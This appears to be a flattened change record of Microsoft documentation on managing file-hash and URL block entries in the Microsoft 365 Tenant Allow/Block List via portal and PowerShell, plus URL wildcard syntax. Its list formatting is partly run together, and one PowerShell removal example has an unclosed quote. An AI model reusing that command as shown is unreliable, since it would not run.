- - **30 days** (default)
- - **Never expire**
- - **Specific date**: The maximum value is 90 days from today.
-
- - **Optional note**: Enter descriptive text for why you're blocking the files.
-
- When you're finished in the **Block files** flyout, select **Add**.
-
-Back on the **Files** tab, the entry is listed.
-
-#### Use PowerShell to create block entries for files in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-New-TenantAllowBlockListItems -ListType FileHash -Block -Entries "HashValue1","HashValue2",..."HashValueN" <-ExpirationDate Date | -NoExpiration> [-Notes <String>]
-```
-
-This example adds a block entry for the specified files that never expires.
-
-```powershell
-New-TenantAllowBlockListItems -ListType FileHash -Block -Entries "768a813668695ef2483b2bde7cf5d1b2db0423a0d3e63e498f3ab6f2eb13ea3","2c0a35409ff0873cfa28b70b8224e9aca2362241c1f0ed6f622fef8d4722fd9a" -NoExpiration
-```
-
-For detailed syntax and parameter information, see [New-TenantAllowBlockListItems](/powershell/module/exchange/new-tenantallowblocklistitems).
-
-## Use the Microsoft Defender portal to view entries for files in the Tenant Allow/Block List
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Tenant Allow/Block Lists** in the **Rules** section. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-Select the **Files** tab.
-
-On the **Files** tab, you can sort the entries by clicking on an available column header. The following columns are available:
--- **Value**: The file hash.-- **Action**: The available values are **Allow** or **Block**.-- **Modified by**-- **Last updated**-- **Remove on**: The expiration date.-- **Notes**-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filter** flyout that opens:
--- **Action**: The available values are **Allow** and **Block**.-- **Never expire**: :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: or :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::-- **Last updated**: Select **From** and **To** dates.-- **Remove on**: Select **From** and **To** dates.-
-When you're finished in the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific entries.
-
-To group the entries, select :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group** and then select **Action**. To ungroup the entries, select **None**.
-
-### Use PowerShell to view entries for files in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Get-TenantAllowBlockListItems -ListType FileHash [-Allow] [-Block] [-Entry <FileHashValue>] [<-ExpirationDate Date | -NoExpiration>]
-```
-
-This example returns all allowed and blocked files.
-
-```powershell
-Get-TenantAllowBlockListItems -ListType FileHash
-```
-
-This example returns information for the specified file hash value.
-
-```powershell
-Get-TenantAllowBlockListItems -ListType FileHash -Entry "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
-```
-
-This example filters the results by blocked files.
-
-```powershell
-Get-TenantAllowBlockListItems -ListType FileHash -Block
-```
-
-For detailed syntax and parameter information, see [Get-TenantAllowBlockListItems](/powershell/module/exchange/get-tenantallowblocklistitems).
-
-## Use the Microsoft Defender portal to modify entries for files in the Tenant Allow/Block List
-
-In existing file entries, you can change the expiration date and note.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. Select the **Files** tab
-
-3. On the **Files** tab, select the entry from the list by selecting the check box next to the first column, and then select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.
-
-4. In the **Edit file** flyout that opens, the following settings are available:
- - **Block entries**:
- - **Remove block entry after**: Select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Never expire**
- - **Specific date**: The maximum value is 90 days from today.
- - **Optional note**
- - **Allow entries**:
- - **Remove allow entry after**: Select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Specific date**: The maximum value is 30 days from today.
- - **Optional note**
-
- When you're finished in the **Edit file** flyout, select **Save**.
-
-> [!TIP]
-> In the details flyout of an entry on the **Files** tab, use :::image type="icon" source="../../media/m365-cc-sc-view-submission-icon.png" border="false"::: **View submission** at the top of the flyout to go to the details of the corresponding entry on the **Submissions** page. This action is available if a submission was responsible for creating the entry in the Tenant Allow/Block List.
-
-### Use PowerShell to modify existing allow or block entries for files in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Set-TenantAllowBlockListItems -ListType FileHash <-Ids <Identity value> | -Entries <Value>> [<-ExpirationDate Date | -NoExpiration>] [-Notes <String>]
-```
-
-This example changes the expiration date of the specified file block entry.
-
-```powershell
-Set-TenantAllowBlockListItems -ListType FileHash -Entries "27c5973b2451db9deeb01114a0f39e2cbcd2f868d08cedb3e210ab3ece102214" -ExpirationDate "9/1/2022"
-```
-
-For detailed syntax and parameter information, see [Set-TenantAllowBlockListItems](/powershell/module/exchange/set-tenantallowblocklistitems).
-
-## Use the Microsoft Defender portal to remove entries for files from the Tenant Allow/Block List
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. Select the **Files** tab.
-
-3. On the **Files** tab, do one of the following steps:
-
- - Select the entry from the list by selecting the check box next to the first column, and then select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears.
- - Select the entry from the list by clicking anywhere in the row other than the check box. In the details flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** at the top of the flyout.
-
- > [!TIP]
- > To see details about other entries without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-4. In the warning dialog that opens, select **Delete**.
-
-Back on the **Files** tab, the entry is no longer listed.
-
-> [!TIP]
-> You can select multiple entries by selecting each check box, or select all entries by selecting the check box next to the **Value** column header.
-
-### Use PowerShell to remove entries for files from the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Remove-TenantAllowBlockListItems -ListType FileHash <-Ids <Identity value> | -Entries <Value>>
-```
-
-This example removes the specified file block from the Tenant Allow/Block List.
-
-```powershell
-Remove-TenantAllowBlockListItems -ListType FileHash -Entries "27c5973b2451db9deeb01114a0f39e2cbcd2f868d08cedb3e210ab3ece102214"
-```
-
-For detailed syntax and parameter information, see [Remove-TenantAllowBlockListItems](/powershell/module/exchange/remove-tenantallowblocklistitems).
-
-## Related articles
--- [Use the Submissions page to submit suspected spam, phish, URLs, legitimate email getting blocked, and email attachments to Microsoft](submissions-admin.md)-- [Report false positives and false negatives](submissions-outlook-report-messages.md)-- [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md)-- [Allow or block emails in the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md)-- [Allow or block URLs in the Tenant Allow/Block List](tenant-allow-block-list-urls-configure.md)
security Tenant Allow Block List Urls Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/tenant-allow-block-list-urls-configure.md
- Title: Allow or block URLs using the Tenant Allow/Block List
- - NOCSH
----
- - MET150manage-tenant-allows.md
-
- - m365-security
- - tier1
-description: Admins can learn how to allow or block URLs in the Tenant Allow/Block List.
- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Allow or block URLs using the Tenant Allow/Block List
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, admins can create and manage entries for URLs in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
-> [!NOTE]
-> To allow phishing URLs from third-party phishing simulations, use the [advanced delivery configuration](advanced-delivery-policy-configure.md) to specify the URLs. Don't use the Tenant Allow/Block List.
-
-This article describes how admins can manage entries for URLs in the Microsoft Defender portal and in Exchange Online PowerShell.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Tenant Allow/Block List** page, use <https://security.microsoft.com/tenantAllowBlockList>. To go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- For URL entry syntax, see the [URL syntax for the Tenant Allow/Block List](#url-syntax-for-the-tenant-allowblock-list) section later in this article.--
- - **Exchange Online Protection**: The maximum number of allow entries is 500, and the maximum number of block entries is 500 (1000 URL entries in total).
- - **Defender for Office 365 Plan 1**: The maximum number of allow entries is 1000, and the maximum number of block entries is 1000 (2000 URL entries in total).
- - **Defender for Office 365 Plan 2**: The maximum number of allow entries is 5000, and the maximum number of block entries is 10000 (15000 URL entries in total).
--- You can enter a maximum of 250 characters in a URL entry.--- An entry should be active within 5 minutes.--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell):
- - *Add and remove entries from the Tenant Allow/Block List*: Membership assigned with the following permissions:
- - **Authorization and settings/Security settings/Detection tuning (manage)**
- - *Read-only access to the Tenant Allow/Block List*:
- - **Authorization and settings/Security settings/Read-only**.
- - **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - *Add and remove entries from the Tenant Allow/Block List*: Membership in one of the following role groups:
- - **Organization Management** or **Security Administrator** (Security admin role).
- - **Security Operator** (Tenant AllowBlockList Manager).
- - *Read-only access to the Tenant Allow/Block List*: Membership in one of the following role groups:
- - **Global Reader**
- - **Security Reader**
- - **View-Only Configuration**
- - **View-Only Organization Management**
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions *and* permissions for other features in Microsoft 365.
-
-## Create allow entries for URLs
-
-You can't create allow entries for URLs directly in the Tenant Allow/Block List. Unnecessary allow entries expose your organization to malicious email that would have been filtered by the system.
-
-Instead, you use the **URLs** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=url>. When you submit a blocked URL as **Should not have been blocked (False positive)**, you can select **Allow this URL** to add and allow entry for the URL on the **URLs** tab on the **Tenant Allow/Block Lists** page. For instructions, see [Report good URLs to Microsoft](submissions-admin.md#report-good-urls-to-microsoft).
-
-> [!NOTE]
-> We create allow entries for URLs that were determined to be malicious by our filters during mail flow or at time of click.
->
-> We allow subsequent messages that contain variations of the original URL. For example, you use the **Submissions** page to report the incorrectly blocked URL `www.contoso.com/abc`. If your organization later receives a message that contains the URL (for example but not limited to: `www.contoso.com/abc`, `www.contoso.com/abc?id=1`, `www.contoso.com/abc/def/gty/uyt?id=5`, or `www.contoso.com/abc/whatver`), the message isn't blocked based on the URL. In other words, you don't need to report multiple variations of the same URL as good to Microsoft.
->
-> When the entity in the allow entry is encountered again (during mail flow or at time of click), all filters associated with that entity are overridden.
->
-> By default, allow entries for URLs exist for 30 days. During those 30 days, Microsoft learns from the allow entries and [removes them or automatically extends them](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/automatic-tenant-allow-block-list-expiration-management-is-now/ba-p/3723447). After Microsoft learns from the removed allow entries, messages that contain those URLs are delivered, unless something else in the message is detected as malicious.
->
-> During mail flow, if messages containing the allowed URL pass other checks in the filtering stack, the messages are delivered. For example, if a message passes [email authentication checks](email-authentication-about.md) and file filtering, the message is delivered if it also contains an allowed URL.
->
-> During time of click, the URL allow entry overrides all filters associated with the URL entity, which allows users to access the URL.
->
-> A URL allow entry doesn't prevent the URL from being wrapped by Safe Links protection in Defender for Office 365. For more information, see [Do not rewrite list in SafeLinks](safe-links-about.md#do-not-rewrite-the-following-urls-lists-in-safe-links-policies).
-
-## Create block entries for URLs
-
-Email messages that contain these blocked URLs are blocked as *high confidence phishing*. Messages that contain the blocked URLs are quarantined.
-
-To create block entries for URLs, use either of the following methods:
-
-You have the following options to create block entries for URLs:
--- From the **URLs** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=url>. When you submit a message as **Should have been blocked (False negative)**, you can select **Block this URL** to add a block entry to the **URLs** tab on the **Tenant Allow/Block Lists** page. For instructions, see [Report questionable URLs to Microsoft](submissions-admin.md#report-questionable-urls-to-microsoft).--- From the **URLs** tab on the **Tenant Allow/Block Lists** page or in PowerShell as described in this section.-
-### Use the Microsoft Defender portal to create block entries for URLs in the Tenant Allow/Block List
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block List** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. On the **Tenant Allow/Block List** page, select the **URLs** tab.
-
-3. On the **URLs** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Block**.
-
-4. In the **Block URLs** flyout that opens, configure the following settings:
-
- - **Add URLs with wildcards**: Enter one URL per line, up to a maximum of 20. For details about the syntax for URL entries, see the [URL syntax for the Tenant Allow/Block List](#url-syntax-for-the-tenant-allowblock-list) section later in this article.
-
- - **Remove block entry after**: Select from the following values:
- - **Never expire**
- - **1 day**
- - **7 days**
- - **30 days** (default)
- - **Specific date**: The maximum value is 90 days from today.
-
- - **Optional note**: Enter descriptive text for why you're blocking the URLs.
-
- When you're finished in the **Block URLs** flyout, select **Add**.
-
-Back on the **URLs** tab, the entry is listed.
-
-#### Use PowerShell to create block entries for URLs in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-New-TenantAllowBlockListItems -ListType Url -Block -Entries "Value1","Value2",..."ValueN" <-ExpirationDate <Date> | -NoExpiration> [-Notes <String>]
-```
-
-This example adds a block entry for the URL contoso.com and all subdomains (for example, contoso.com and xyz.abc.contoso.com). Because we didn't use the ExpirationDate or NoExpiration parameters, the entry expires after 30 days.
-
-```powershell
-New-TenantAllowBlockListItems -ListType Url -Block -Entries *contoso.com
-```
-
-For detailed syntax and parameter information, see [New-TenantAllowBlockListItems](/powershell/module/exchange/new-tenantallowblocklistitems).
-
-## Use the Microsoft Defender portal to view entries for URLs in the Tenant Allow/Block List
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Tenant Allow/Block Lists** in the **Rules** section. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-Select the **URLs** tab.
-
-On the **URLs** tab, you can sort the entries by clicking on an available column header. The following columns are available:
--- **Value**: The URL.-- **Action**: The available values are **Allow** or **Block**.-- **Modified by**-- **Last updated**-- **Remove on**: The expiration date.-- **Notes**-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filter** flyout that opens:
--- **Action**: The available values are **Allow** and **Block**.-- **Never expire**: :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: or :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::-- **Last updated**: Select **From** and **To** dates.-- **Remove on**: Select **From** and **To** dates.-
-When you're finished in the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific entries.
-
-To group the entries, select :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group** and then select **Action**. To ungroup the entries, select **None**.
-
-### Use PowerShell to view entries for URLs in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Get-TenantAllowBlockListItems -ListType Url [-Allow] [-Block] [-Entry <URLValue>] [<-ExpirationDate <Date> | -NoExpiration>]
-```
-
-This example returns all allowed and blocked URLs.
-
-```powershell
-Get-TenantAllowBlockListItems -ListType Url
-```
-
-This example filters the results by blocked URLs.
-
-```powershell
-Get-TenantAllowBlockListItems -ListType Url -Block
-```
-
-For detailed syntax and parameter information, see [Get-TenantAllowBlockListItems](/powershell/module/exchange/get-tenantallowblocklistitems).
-
-## Use the Microsoft Defender portal to modify entries for URLs in the Tenant Allow/Block List
-
-In existing URL entries, you can change the expiration date and note.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. Select the **URLs** tab
-
-3. On the **URLs** tab, select the entry from the list by selecting the check box next to the first column, and then select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.
-
-4. In the **Edit URL** flyout that opens, the following settings are available:
- - **Block entries**:
- - **Remove block entry after**: Select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Never expire**
- - **Specific date**: The maximum value is 90 days from today.
- - **Optional note**
- - **Allow entries**:
- - **Remove allow entry after**: Select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Specific date**: The maximum value is 30 days from today.
- - **Optional note**
-
- When you're finished in the **Edit URL** flyout, select **Save**.
-
-> [!TIP]
-> In the details flyout of an entry on the **URLs** tab, use :::image type="icon" source="../../media/m365-cc-sc-view-submission-icon.png" border="false"::: **View submission** at the top of the flyout to go to the details of the corresponding entry on the **Submissions** page. This action is available if a submission was responsible for creating the entry in the Tenant Allow/Block List.
-
-### Use PowerShell to modify entries for URLs in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Set-TenantAllowBlockListItems -ListType Url <-Ids <Identity value> | -Entries <Value>> [<-ExpirationDate Date | -NoExpiration>] [-Notes <String>]
-```
-
-This example changes the expiration date of the block entry for the specified URL.
-
-```powershell
-Set-TenantAllowBlockListItems -ListType Url -Entries "~contoso.com" -ExpirationDate "9/1/2022"
-```
-
-For detailed syntax and parameter information, see [Set-TenantAllowBlockListItems](/powershell/module/exchange/set-tenantallowblocklistitems).
-
-## Use the Microsoft Defender portal to remove entries for URLs from the Tenant Allow/Block List
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block List** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. Select the **URLs** tab.
-
-3. On the **URLs** tab, do one of the following steps:
-
- - Select the entry from the list by selecting the check box next to the first column, and then select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears.
- - Select the entry from the list by clicking anywhere in the row other than the check box. In the details flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** at the top of the flyout.
-
- > [!TIP]
- > To see details about other entries without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-4. In the warning dialog that opens, select **Delete**.
-
-Back on the **URLs** tab, the entry is no longer listed.
-
-> [!TIP]
-> You can select multiple entries by selecting each check box, or select all entries by selecting the check box next to the **Value** column header.
-
-### Use PowerShell to remove entries for URLs from the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Remove-TenantAllowBlockListItems -ListType Url <-Ids <Identity value> | -Entries <Value>>
-```
-
-This example removes the block entry for the specified URL from the Tenant Allow/Block List.
-
-```powershell
-Remove-TenantAllowBlockListItems -ListType Url -Entries "*cohovineyard.com
-```
-
-For detailed syntax and parameter information, see [Remove-TenantAllowBlockListItems](/powershell/module/exchange/remove-tenantallowblocklistitems).
-
-## URL syntax for the Tenant Allow/Block List
--- IPv4 and IPv6 addresses are allowed, but TCP/UDP ports aren't.--- Filename extensions aren't allowed (for example, test.pdf).--- Unicode isn't supported, but Punycode is.--- Hostnames are allowed if all of the following statements are true:
- - The hostname contains a period.
- - There is at least one character to the left of the period.
- - There are at least two characters to the right of the period.
-
- For example, `t.co` is allowed; `.com` or `contoso.` aren't allowed.
--- Subpaths aren't implied for allows.-
- For example, `contoso.com` doesn't include `contoso.com/a`.
--- Wildcards (*) are allowed in the following scenarios:-
- - A left wildcard must be followed by a period to specify a subdomain. (applicable only for blocks)
-
- For example, `*.contoso.com` is allowed; `*contoso.com` isn't allowed.
-
- - A right wildcard must follow a forward slash (/) to specify a path.
-
- For example, `contoso.com/*` is allowed; `contoso.com*` or `contoso.com/ab*` aren't allowed.
-
- - `*.com*` is invalid (not a resolvable domain and the right wildcard doesn't follow a forward slash).
-
- - Wildcards aren't allowed in IP addresses.
--- The tilde (~) character is available in the following scenarios:-
- - A left tilde implies a domain and all subdomains.
-
- For example, `~contoso.com` includes `contoso.com` and `*.contoso.com`.
--- A username or password isn't supported or required.--- Quotes (' or ") are invalid characters.--- A URL should include all redirects where possible.-
-### URL entry scenarios
-
-Valid URL entries and their results are described in the following subsections.
-
-#### Scenario: Top-level domain blocking
-
-**Entry**: `*.<TLD>/*`
--- **Block match**:
- - a.TLD
- - TLD/abcd
- - b.abcd.TLD
- - TLD/contoso.com
- - TLD/q=contoso.com
- - `www.abcd.TLD`
- - `www.abcd.TLD/q=a@contoso.com`
-
-#### Scenario: No wildcards
-
-**Entry**: `contoso.com`
--- **Allow match**: contoso.com--- **Allow not matched**:
- - abc-contoso.com
- - contoso.com/a
- - payroll.contoso.com
- - test.com/contoso.com
- - test.com/q=contoso.com
- - `www.contoso.com`
- - `www.contoso.com/q=a@contoso.com`
--- **Block match**:
- - contoso.com
- - contoso.com/a
- - payroll.contoso.com
- - test.com/contoso.com
- - test.com/q=contoso.com
- - `www.contoso.com`
- - `www.contoso.com/q=a@contoso.com`
--- **Block not matched**: abc-contoso.com-
-#### Scenario: Left wildcard (subdomain)
-
-> [!TIP]
-> Allow entries of this pattern are supported only from [advanced delivery configuration](advanced-delivery-policy-configure.md).
-
-**Entry**: `*.contoso.com`
--- **Allow match** and **Block match**:
- - `www.contoso.com`
- - xyz.abc.contoso.com
--- **Allow not matched** and **Block not matched**:
- - 123contoso.com
- - contoso.com
- - test.com/contoso.com
- - `www.contoso.com/abc`
-
-#### Scenario: Right wildcard at top of path
-
-**Entry**: `contoso.com/a/*`
--- **Allow match** and **Block match**:
- - contoso.com/a/b
- - contoso.com/a/b/c
- - contoso.com/a/?q=joe@t.com
--- **Allow not matched** and **Block not matched**:
- - contoso.com
- - contoso.com/a
- - `www.contoso.com`
- - `www.contoso.com/q=a@contoso.com`
-
-#### Scenario: Left tilde
-
-> [!TIP]
-> Allow entries of this pattern are supported only from [advanced delivery configuration](advanced-delivery-policy-configure.md).
-
-**Entry**: `~contoso.com`
--- **Allow match** and **Block match**:
- - contoso.com
- - `www.contoso.com`
- - xyz.abc.contoso.com
--- **Allow not matched** and **Block not matched**:
- - 123contoso.com
- - contoso.com/abc
- - `www.contoso.com/abc`
-
-#### Scenario: Right wildcard suffix
-
-**Entry**: `contoso.com/*`
--- **Allow match** and **Block match**:
- - contoso.com/?q=whatever@fabrikam.com
- - contoso.com/a
- - contoso.com/a/b/c
- - contoso.com/ab
- - contoso.com/b
- - contoso.com/b/a/c
- - contoso.com/ba
--- **Allow not matched** and **Block not matched**: contoso.com-
-#### Scenario: Left wildcard subdomain and right wildcard suffix
-
-> [!TIP]
-> Allow entries of this pattern are supported only from [advanced delivery configuration](advanced-delivery-policy-configure.md).
-
-**Entry**: `*.contoso.com/*`
--- **Allow match** and **Block match**:
- - abc.contoso.com/ab
- - abc.xyz.contoso.com/a/b/c
- - `www.contoso.com/a`
- - `www.contoso.com/b/a/c`
- - xyz.contoso.com/ba
--- **Allow not matched** and **Block not matched**: contoso.com/b-
-#### Scenario: Left and right tilde
-
-> [!TIP]
-> Allow entries of this pattern are supported only from [advanced delivery configuration](advanced-delivery-policy-configure.md).
-
-**Entry**: `~contoso.com~`
--- **Allow match** and **Block match**:
- - contoso.com
- - contoso.com/a
- - `www.contoso.com`
- - `www.contoso.com/b`
- - xyz.abc.contoso.com
- - abc.xyz.contoso.com/a/b/c
- - contoso.com/b/a/c
- - test.com/contoso.com
--- **Allow not matched** and **Block not matched**:
- - 123contoso.com
- - contoso.org
- - test.com/q=contoso.com
-
-#### Scenario: IP address
-
-**Entry**: `1.2.3.4`
--- **Allow match** and **Block match**: 1.2.3.4--- **Allow not matched** and **Block not matched**:
- - 1.2.3.4/a
- - 11.2.3.4/a
-
-#### IP address with right wildcard
-
-**Entry**: `1.2.3.4/*`
--- **Allow match** and **Block match**:
- - 1.2.3.4/b
- - 1.2.3.4/baaaa
-
-### Examples of invalid entries
-
-The following entries are invalid:
--- **Missing or invalid domain values**:
- - contoso
- - \*.contoso.\*
- - \*.com
- - \*.pdf
--- **Wildcard on text or without spacing characters**:
- - \*contoso.com
- - contoso.com\*
- - \*1.2.3.4
- - 1.2.3.4\*
- - contoso.com/a\*
- - contoso.com/ab\*
--- **IP addresses with ports**:
- - contoso.com:443
- - abc.contoso.com:25
--- **Non-descriptive wildcards**:
- - \*
- - \*.\*
--- **Middle wildcards**:
- - conto\*so.com
- - conto~so.com
--- **Double wildcards**
- - contoso.com/\*\*
- - contoso.com/\*/\*
-
-## Related articles
--- [Use the Submissions page to submit suspected spam, phish, URLs, legitimate email getting blocked, and email attachments to Microsoft](submissions-admin.md)-- [Report false positives and false negatives](submissions-outlook-report-messages.md)-- [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md)-- [Allow or block files in the Tenant Allow/Block List](tenant-allow-block-list-files-configure.md)-- [Allow or block emails in the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md)
security Tenant Wide Setup For Increased Security https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/tenant-wide-setup-for-increased-security.md
- Title: Configure your Microsoft 365 tenant for increased security
- - NOCSH
-----
- - Ent_O365
- - Strat_O365_IP
- - m365-security
-
- - seo-marvel-apr2020
- - admindeeplinkSPO
-description: Manual configurations for Exchange Online Protection, Microsoft Defender for Office 365, Plan 1 and 2, and Microsoft Defender XDR, for complete protection of your Office 365 subscription.
- Previously updated : 10/16/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configure your Microsoft 365 tenant for increased security
--
-Your organizational needs require security.
-
-Specifics are up to your business.
-
-This article walks you through the manual configuration of tenant-wide settings that affect the security of your Microsoft 365 environment. Use these recommendations as a starting point.
-
-## Tune EOP and Defender for Office 365 protection policies in the Microsoft Defender portal
-
-The Microsoft Defender portal has capabilities for both protection and reporting. It has dashboards you can use to monitor and take action when threats arise.
-
-As an initial step, you need to configure *email authentication* records in DNS for all custom email domains in Microsoft 365 (SPF, DKIM, and DMARC). Microsoft 365 automatically configures email authentication for the \*.onmicrosoft.com domain. For more information, see [Step 1: Configure email authentication for your Microsoft 365 domains](mdo-deployment-guide.md#step-1-configure-email-authentication-for-your-microsoft-365-domains).
-
-> [!NOTE]
-> For non-standard deployments of SPF, hybrid deployments, and troubleshooting: [Set up SPF to help prevent spoofing](email-authentication-spf-configure.md).
-
-Most protection features in Exchange Online Protection (EOP) and Defender for Office 365 come with *default policy configurations*. For more information, see the table [here](mdo-deployment-guide.md#step-2-configure-protection-policies).
-
-We recommend turning on and using the Standard and/or Strict preset security policies for all recipients. For more information, see the following articles:
--- Turn on and configure preset security policies: [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).-- Difference in settings between Standard and Strict preset security policies: [Policy settings in preset security policies](preset-security-policies.md#policy-settings-in-preset-security-policies).-- Complete list of all features and settings in default policies, Standard preset security policies, and Strict preset security policies: [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).-
